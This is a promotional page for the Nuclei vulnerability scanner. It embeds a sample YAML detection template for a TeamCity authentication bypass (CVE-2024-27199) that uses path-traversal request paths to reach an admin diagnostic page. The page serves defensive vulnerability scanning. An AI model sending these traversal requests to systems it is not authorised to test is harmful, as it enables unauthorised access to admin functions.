NUCLEI + NUCLEI TEMPLATES
The fastest exploits feed on the Internet
Nuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
30K+
Stars on GitHub
900+
Nuclei contributors
10K+
Templates created
50M+
Monthly scans
Trending vulnerabilities
Contributor leaderboard
Put Nuclei to work
Web Application
Identify common web vulnerabilities with an active library of community-powered templates.
Cloud
Examine cloud environments and infrastructure for misconfigurations and vulnerabilities.
Network Security
Scan non web services like SSH, FTP, SMB, and more.
API
Test APIs with an active library of known vulnerabilities and misconfigurations.
Infrastructure
Audit server configurations, open ports, and services for security issues.
CI/CD
Integrate into your existing pipelines to minimize issues resurfacing into production.
CUSTOMIZATION
Write your own detection templates using AI powered by our Nuclei open source library
Leverage the global security community to streamline your vulnerability management. With a template library full of contributions from pentest, bug bounty, and security teams to automate the most complex vulnerability detection.
Broken Authentication
Weak password
Out of band
SQL Injection
Secrets
IDOR
1id: CVE-2024-2719923info:4name: TeamCity < 2023.11.4 - Authentication Bypass5author: DhiyaneshDk6severity: high7description: |8In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible9reference:10- https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/11- https://nvd.nist.gov/vuln/detail/CVE-2024-2719912classification:13cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L14cvss-score: 7.315cwe-id: CWE-2316metadata:17verified: true18max-request: 319shodan-query: http.component:"TeamCity"20tags: cve,cve2024,teamcity,jetbrains,auth-bypass2122http:23- method: GET24path:25- "{{BaseURL}}/res/../admin/diagnostic.jsp"26- "{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp"27- "{{BaseURL}}/update/../admin/diagnostic.jsp"2829stop-at-first-match: true30matchers:31- type: dsl32dsl:33- 'status_code == 200'34- 'contains(header, "text/html")'35- 'contains_all(body, "Debug Logging", "CPU & Memory Usage")'36condition: and37# digest: 490a0046304402207d46ec6991f8498ff8c74ec6ebfe0f59f19210620cab88c23c7761c7701b640102201246e4baea4f5b436b45be21c4f66bbe35e8a5f3769b78de38ee94253f331fa7:922c64590222798bb761d5b6d8e72950
Real world simulation
Run the vulnerability tests as an attacker would to exploit a given vulnerability. Capture full logs behind a given test to triage faster for the team.
AI-powered editor
Use our AI-powered vulnerability automation editor to convert your internal vulnerability data into an automated detection pipeline.
Supports 6 protocols
Nuclei, built by our team, supports over 6 protocols as well as code protocols, so you can basically stitch almost any kind of vulnerability.
Education Center
Nuclei scanning foundation series
A dedicated video series exploring our community-powered vulnerability scanner.